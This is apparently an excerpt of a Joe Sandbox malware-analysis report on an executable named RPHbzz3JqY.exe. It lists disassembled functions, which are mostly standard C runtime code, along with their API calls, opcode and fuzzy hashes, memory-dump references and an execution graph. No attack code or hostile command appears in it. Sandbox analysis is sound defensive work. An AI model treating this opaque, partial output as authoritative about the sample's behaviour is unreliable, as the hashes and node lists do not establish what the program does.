                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\RPHbzz3JqY.exe
                                                                                                                                                                                            • API String ID: 0-2732183378
                                                                                                                                                                                            • Opcode ID: e913d240976a20e3e738c7875e808fa139fe102b7ffa02e9aa06bdea0362e2ae
                                                                                                                                                                                            • Instruction ID: 9bf0520eaed447d8e0732ed662cc94ba320d74e1aa5c1972148ad0fbe12931cd
                                                                                                                                                                                            • Opcode Fuzzy Hash: e913d240976a20e3e738c7875e808fa139fe102b7ffa02e9aa06bdea0362e2ae
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF41A0B1A00A1DAFDB229F99D985ABEBFF9FFC5310B10006AE64497251D7B48E41CB50
                                                                                                                                                                                            Function 005F4072 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005F4097
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: 5096c7c9fe75f529601351cbb6ef95308ea32f17db9f0d7fb12a941b2d186c5b
                                                                                                                                                                                            • Instruction ID: bdeb0d41f56e8ebafa6abcac2cd5f4fe51262595c5b2e1c49b2d4ce209ed7c65
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5096c7c9fe75f529601351cbb6ef95308ea32f17db9f0d7fb12a941b2d186c5b
                                                                                                                                                                                            • Instruction Fuzzy Hash: B141467290020DAFDF15DF98CC85AAEBFB5BF58300F198159FA04A7211D7399AA1DF50
                                                                                                                                                                                            Function 005D2310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 005D23CE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: c4]$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-3697889776
                                                                                                                                                                                            • Opcode ID: 94ba8d3c9167f167e53a54d618ae3591a7a00002f7c6054525edddad74d3d71d
                                                                                                                                                                                            • Instruction ID: 319f2c97b2997026db8ff841ba1f5cf074899524d14783ef2390db26b51dc8f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 94ba8d3c9167f167e53a54d618ae3591a7a00002f7c6054525edddad74d3d71d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B210472600109ABD718EF5CC885AAEFFADEF85310F10C55BFA4497341E775AE808BA0
                                                                                                                                                                                            Function 00606797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID: l=a
                                                                                                                                                                                            • API String ID: 269201875-4006736422
                                                                                                                                                                                            • Opcode ID: 375742af8de880917483bec6587131f47f741514c068a19653904d8e269ce124
                                                                                                                                                                                            • Instruction ID: 42052439f09afeff626dfb29e36c959ba9635da477b5322e4357965dce0da80e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 375742af8de880917483bec6587131f47f741514c068a19653904d8e269ce124
                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF0C8735883156AE7192A61EC42BE73F9EEF81774F24043EFA0C9A2C3DA61185146F5
                                                                                                                                                                                            Function 005EF7F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005EF7FC
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005EF857
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 593203224-1162301288
                                                                                                                                                                                            • Opcode ID: 2d8d7fa8ec9a8b7c7b50c28b8778e920b56d4ed48ec0c5bbfd2b8ea99a4d7e07
                                                                                                                                                                                            • Instruction ID: 60355878ce4de900226dd5255e4624c29e4efb74426a2d67503bd7e237ae888a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8d7fa8ec9a8b7c7b50c28b8778e920b56d4ed48ec0c5bbfd2b8ea99a4d7e07
                                                                                                                                                                                            • Instruction Fuzzy Hash: B1017135600215AFDB09DF15C895E5EBF79FF84750B1404A9E8459B3A1EF71EE40CB90
                                                                                                                                                                                            Function 005D2070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D2078
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005D20BC
                                                                                                                                                                                              • Part of subcall function 005EF860: _Yarn.LIBCPMT ref: 005EF87F
                                                                                                                                                                                              • Part of subcall function 005EF860: _Yarn.LIBCPMT ref: 005EF8A3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                            • Opcode ID: caae7583464a876da91437bf0d0d3e44bd0a8ad7acf44016b2fb1c82ec646e14
                                                                                                                                                                                            • Instruction ID: 5e53f0a18644cce25c4c3b13bc9d9500850f35d6ef74bfa5690bc30fa25d3e14
                                                                                                                                                                                            • Opcode Fuzzy Hash: caae7583464a876da91437bf0d0d3e44bd0a8ad7acf44016b2fb1c82ec646e14
                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F04971100B808ED3349F7A8409743BEE4AF25310F004A2EE5CAC7A82E775E508CBA5
                                                                                                                                                                                            Function 005F7DDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(0061D3B0,0000000C), ref: 005F7DF2
                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 005F7DF9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorExitLastThread
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 1611280651-1162301288
                                                                                                                                                                                            • Opcode ID: 09662a7dcd606d962caa9849debef9cc578e101770e74338eba63234599fa8bb
                                                                                                                                                                                            • Instruction ID: c4f63b80a8c98a3ae01883856452aa64b41320dbcf8e53d084e8099679db82f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 09662a7dcd606d962caa9849debef9cc578e101770e74338eba63234599fa8bb
                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF0A47094061E9FDB10AF70C80EA7E7F75FF85710F240959F2119B291CB795901CBA1
                                                                                                                                                                                            Function 005EF0D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 005EF11B
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 005EF132
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep___std_exception_destroy
                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                            • API String ID: 2427919145-410509341
                                                                                                                                                                                            • Opcode ID: ce12c876a9f9adfea07bbc0670c194daa27135df30e9fcf7b48569acc498f2e5
                                                                                                                                                                                            • Instruction ID: da4415d02617d6e6183bb3f001bbb416f2d0701d32fd06824490e46a1874263c
                                                                                                                                                                                            • Opcode Fuzzy Hash: ce12c876a9f9adfea07bbc0670c194daa27135df30e9fcf7b48569acc498f2e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF0E0B070022057D70CAB75DC59A3E3AA56BC4700F80005CF54557382EA615E448BB6
                                                                                                                                                                                            Function 005FD4B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,005FDD21,-00000020,00000FA0,00000000,00000000,00000000,00000000,005D1C72), ref: 005FD4F8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                            • String ID: @0]$InitializeCriticalSectionEx
                                                                                                                                                                                            • API String ID: 2593887523-2466669
                                                                                                                                                                                            • Opcode ID: 1dd81996eae76e4076587eea73a921f6b120254e85f04590d150956deb425331
                                                                                                                                                                                            • Instruction ID: 114d4a131491be4fdc96d0d435a166e2259b79817d0ae15d00f5ab8c7f475f7e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dd81996eae76e4076587eea73a921f6b120254e85f04590d150956deb425331
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FE0923118022DB7DF112F40DC09DEEBF27FB40B60B05C420FE1916261DBB78960A6E0
                                                                                                                                                                                            Function 005FD33E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Alloc
                                                                                                                                                                                            • String ID: @0]$FlsAlloc
                                                                                                                                                                                            • API String ID: 2773662609-3171498700
                                                                                                                                                                                            • Opcode ID: 5781ef21b652887bcaea81a75cc37deedc6b1bcd43f041e2eccd5441cf857e33
                                                                                                                                                                                            • Instruction ID: 3309b9de5fcb8c87596aa947a24a0eefcae592119609525cce647c2513261b63
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5781ef21b652887bcaea81a75cc37deedc6b1bcd43f041e2eccd5441cf857e33
                                                                                                                                                                                            • Instruction Fuzzy Hash: D0E0CD315C463873D35123915C09EAB7D1BE754F61B090C20FB051128185A6494181E1

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:3.4%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:870
                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                            execution_graph 24536 556254 64 API calls 2 library calls 24437 56c054 47 API calls 24438 567854 42 API calls 3 library calls 24487 550d57 26 API calls 24537 557e51 25 API calls 2 library calls 24489 533d40 66 API calls 24492 55a141 GetCommandLineA GetCommandLineW 24442 53104d 46 API calls 24494 54f94b 9 API calls 3 library calls 24443 56ac72 71 API calls 3 library calls 24586 54ff72 44 API calls 4 library calls 24445 55d47c 26 API calls 2 library calls 24446 55bc7f 7 API calls ___scrt_uninitialize_crt 24588 54db20 157 API calls 3 library calls 24590 543b60 68 API calls 2 library calls 24592 553760 6 API calls 4 library calls 24390 550d69 24391 550d75 ___scrt_is_nonwritable_in_current_image 24390->24391 24415 550f6b 24391->24415 24393 550d7c 24394 550ed5 24393->24394 24403 550da6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 24393->24403 24431 551434 4 API calls 2 library calls 24394->24431 24396 550edc 24397 5566fe 23 API calls 24396->24397 24398 550ee2 24397->24398 24432 5566c2 23 API calls std::locale::_Setgloballocale 24398->24432 24400 550eea 24401 550dc5 24402 550e46 24423 559f7c 24402->24423 24403->24401 24403->24402 24427 5566d8 37 API calls 4 library calls 24403->24427 24406 550e4c 24407 550e63 24406->24407 24428 551554 GetModuleHandleW 24407->24428 24409 550e6d 24409->24396 24410 550e71 24409->24410 24411 550e7a 24410->24411 24429 5566b3 23 API calls std::locale::_Setgloballocale 24410->24429 24430 5510dc 73 API calls ___scrt_uninitialize_crt 24411->24430 24414 550e83 24414->24401 24416 550f74 24415->24416 24433 550ad3 IsProcessorFeaturePresent 24416->24433 24418 550f80 24434 5538be 10 API calls 2 library calls 24418->24434 24420 550f85 24421 550f89 24420->24421 24435 5538dd 7 API calls 2 library calls 24420->24435 24421->24393 24424 559f85 24423->24424 24425 559f8a 24423->24425 24436 559ce0 49 API calls 24424->24436 24425->24406 24427->24402 24428->24409 24429->24411 24430->24414 24431->24396 24432->24400 24433->24418 24434->24420 24435->24421 24436->24425 24498 55d969 30 API calls 2 library calls 24594 541310 29 API calls 24448 53101b 28 API calls 24449 55f019 64 API calls 2 library calls 24450 568004 GetProcessHeap 24598 531300 14 API calls 2 library calls 24600 532700 68 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24551 543a00 67 API calls 24451 531005 29 API calls 24503 562d00 15 API calls 24552 56c600 21 API calls 24601 54f70c 16 API calls 2 library calls 24452 533030 EnterCriticalSection __fread_nolock 24506 54f537 DeleteCriticalSection 24604 535330 27 API calls CallUnexpected 24553 550232 DecodePointer 24554 55ea32 32 API calls 4 library calls 24555 552238 50 API calls 2 library calls 24556 55263b 8 API calls 23393 562727 23398 5624fd 23393->23398 23396 562766 23399 56251c 23398->23399 23400 56252f 23399->23400 23408 562544 23399->23408 23418 558b26 14 API calls __dosmaperr 23400->23418 23402 562534 23419 554e3f 25 API calls __Getctype 23402->23419 23404 56253f 23404->23396 23415 56ad8f 23404->23415 23406 562715 23424 554e3f 25 API calls __Getctype 23406->23424 23413 562664 23408->23413 23420 56874a 37 API calls 3 library calls 23408->23420 23410 5626b4 23410->23413 23421 56874a 37 API calls 3 library calls 23410->23421 23412 5626d2 23412->23413 23422 56874a 37 API calls 3 library calls 23412->23422 23413->23404 23423 558b26 14 API calls __dosmaperr 23413->23423 23425 56a754 23415->23425 23418->23402 23419->23404 23420->23410 23421->23412 23422->23413 23423->23406 23424->23404 23426 56a760 ___scrt_is_nonwritable_in_current_image 23425->23426 23427 56a767 23426->23427 23430 56a792 23426->23430 23445 558b26 14 API calls __dosmaperr 23427->23445 23429 56a76c 23446 554e3f 25 API calls __Getctype 23429->23446 23436 56ad21 23430->23436 23435 56a776 23435->23396 23448 5642f4 23436->23448 23441 56ad57 23443 56a7b6 23441->23443 23502 55ce37 14 API calls __dosmaperr 23441->23502 23447 56a7e9 LeaveCriticalSection __wsopen_s 23443->23447 23445->23429 23446->23435 23447->23435 23503 556ccd 23448->23503 23452 564318 23453 5593c7 23452->23453 23515 559315 23453->23515 23456 56adaf 23457 56adcc 23456->23457 23458 56ade1 23457->23458 23459 56adfa 23457->23459 23554 558b13 14 API calls __dosmaperr 23458->23554 23540 565ab0 23459->23540 23463 56ae1f 23553 56aa68 CreateFileW 23463->23553 23464 56ae08 23556 558b13 14 API calls __dosmaperr 23464->23556 23468 56ae0d 23557 558b26 14 API calls __dosmaperr 23468->23557 23469 56ae58 23470 56aed5 GetFileType 23469->23470 23472 56aeaa GetLastError 23469->23472 23558 56aa68 CreateFileW 23469->23558 23473 56af27 23470->23473 23474 56aee0 GetLastError 23470->23474 23559 558af0 14 API calls __dosmaperr 23472->23559 23562 5659fb 15 API calls 2 library calls 23473->23562 23560 558af0 14 API calls __dosmaperr 23474->23560 23475 56ade6 23555 558b26 14 API calls __dosmaperr 23475->23555 23479 56aeee CloseHandle 23479->23475 23482 56af17 23479->23482 23481 56ae9d 23481->23470 23481->23472 23561 558b26 14 API calls __dosmaperr 23482->23561 23483 56af48 23485 56af94 23483->23485 23563 56ac77 71 API calls 3 library calls 23483->23563 23491 56af9b 23485->23491 23565 56a815 71 API calls 4 library calls 23485->23565 23486 56af1c 23486->23475 23489 56afc9 23490 56afd7 23489->23490 23489->23491 23492 56adf3 23490->23492 23494 56b053 CloseHandle 23490->23494 23564 55db0e 28 API calls 2 library calls 23491->23564 23492->23441 23566 56aa68 CreateFileW 23494->23566 23496 56b07e 23497 56b088 GetLastError 23496->23497 23501 56afa2 23496->23501 23567 558af0 14 API calls __dosmaperr 23497->23567 23499 56b094 23568 565bc3 15 API calls 2 library calls 23499->23568 23501->23492 23502->23443 23504 556ced 23503->23504 23510 556ce4 23503->23510 23504->23510 23512 55ca90 37 API calls 3 library calls 23504->23512 23506 556d0d 23513 560cac 37 API calls __Getctype 23506->23513 23508 556d23 23514 560cd9 37 API calls __fassign 23508->23514 23510->23452 23511 55d26e 5 API calls std::_Lockit::_Lockit 23510->23511 23511->23452 23512->23506 23513->23508 23514->23510 23516 559323 23515->23516 23517 55933d 23515->23517 23533 5593e4 14 API calls _free 23516->23533 23519 559344 23517->23519 23520 559363 23517->23520 23524 55932d 23519->23524 23534 559425 15 API calls __wsopen_s 23519->23534 23535 56400f MultiByteToWideChar 23520->23535 23523 559372 23525 559379 GetLastError 23523->23525 23526 55939f 23523->23526 23538 559425 15 API calls __wsopen_s 23523->23538 23524->23441 23524->23456 23536 558af0 14 API calls __dosmaperr 23525->23536 23526->23524 23539 56400f MultiByteToWideChar 23526->23539 23530 559385 23537 558b26 14 API calls __dosmaperr 23530->23537 23531 5593b6 23531->23524 23531->23525 23533->23524 23534->23524 23535->23523 23536->23530 23537->23524 23538->23526 23539->23531 23541 565abc ___scrt_is_nonwritable_in_current_image 23540->23541 23569 55800d EnterCriticalSection 23541->23569 23543 565ae8 23573 56588a 15 API calls 2 library calls 23543->23573 23547 565ac3 23547->23543 23549 565b57 EnterCriticalSection 23547->23549 23551 565b0a 23547->23551 23548 565aed 23548->23551 23574 5659d8 EnterCriticalSection 23548->23574 23550 565b64 LeaveCriticalSection 23549->23550 23549->23551 23550->23547 23570 565bba 23551->23570 23553->23469 23554->23475 23555->23492 23556->23468 23557->23475 23558->23481 23559->23475 23560->23479 23561->23486 23562->23483 23563->23485 23564->23501 23565->23489 23566->23496 23567->23499 23568->23501 23569->23547 23575 558055 LeaveCriticalSection 23570->23575 23572 565b2a 23572->23463 23572->23464 23573->23548 23574->23551 23575->23572 24508 533120 LeaveCriticalSection __Getctype 24558 533620 47 API calls 24509 565522 45 API calls 5 library calls 24457 53102e 72 API calls 24609 5673d4 38 API calls std::_Locinfo::_Locinfo_ctor 24512 5339d0 27 API calls 24611 5337d0 43 API calls std::_Throw_Cpp_error 24612 551fd6 37 API calls 2 library calls 24513 565dd2 41 API calls 3 library calls 24562 55a2d1 11 API calls __Getctype 24458 54f0d3 69 API calls ___std_exception_destroy 24515 5599dc 51 API calls 3 library calls 24563 55d6de FreeLibrary 23576 53c2c0 23577 53c2d3 23576->23577 23594 544d30 23577->23594 23584 53c3fe 23624 532eb0 25 API calls 23584->23624 23586 53c408 23625 531a50 63 API calls 3 library calls 23586->23625 23587 53c450 23592 53c421 23587->23592 23626 532310 43 API calls 3 library calls 23587->23626 23590 53c4ae 23627 551930 RaiseException 23590->23627 23593 53c4bc 23628 550a3c 23594->23628 23597 544d9e 23637 531b80 23597->23637 23600 544dcf 23601 544e13 23600->23601 23604 544e2a 23600->23604 23602 53c341 23601->23602 23661 54fbdc 9 API calls 2 library calls 23601->23661 23609 53c640 23602->23609 23662 532310 43 API calls 3 library calls 23604->23662 23606 544e5e 23663 551930 RaiseException 23606->23663 23608 544e6c 23610 550a3c std::_Facet_Register 16 API calls 23609->23610 23611 53c65b 23610->23611 23613 53c360 23611->23613 23686 54f760 43 API calls 5 library calls 23611->23686 23614 54fdc2 23613->23614 23617 54fd1c 23614->23617 23615 53c3f6 23615->23584 23615->23587 23616 54fd7d 23622 54fd84 23616->23622 23687 54fdcb 23616->23687 23617->23615 23617->23616 23619 54fdcb 28 API calls 23617->23619 23619->23616 23622->23615 23690 5551bb 67 API calls 4 library calls 23622->23690 23624->23586 23625->23592 23626->23590 23627->23593 23630 550a41 23628->23630 23631 544d8e 23630->23631 23634 531790 Concurrency::cancel_current_task 23630->23634 23664 558083 23630->23664 23674 559778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23630->23674 23631->23597 23660 54f760 43 API calls 5 library calls 23631->23660 23633 550a67 23633->23633 23634->23633 23673 551930 RaiseException 23634->23673 23636 5317ac 23677 54f506 7 API calls std::_Lockit::_Lockit 23637->23677 23639 531b97 23641 531bd2 23639->23641 23678 54f506 7 API calls std::_Lockit::_Lockit 23639->23678 23646 531c19 23641->23646 23647 531c2c 23641->23647 23657 531c98 23641->23657 23643 531bb2 23679 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23643->23679 23645 531cb0 23645->23600 23680 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23646->23680 23648 550a3c std::_Facet_Register 16 API calls 23647->23648 23652 531c33 23648->23652 23650 531c23 23650->23600 23651 531c72 23653 531c92 23651->23653 23683 5325f0 59 API calls 2 library calls 23651->23683 23652->23651 23681 532070 62 API calls 2 library calls 23652->23681 23684 54f72e 16 API calls std::_Facet_Register 23653->23684 23685 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23657->23685 23658 531c60 23682 54f975 41 API calls __Getctype 23658->23682 23660->23597 23661->23602 23662->23606 23663->23608 23666 56097d 23664->23666 23665 5609bb 23676 558b26 14 API calls __dosmaperr 23665->23676 23666->23665 23667 5609a6 HeapAlloc 23666->23667 23671 56098f __Getctype 23666->23671 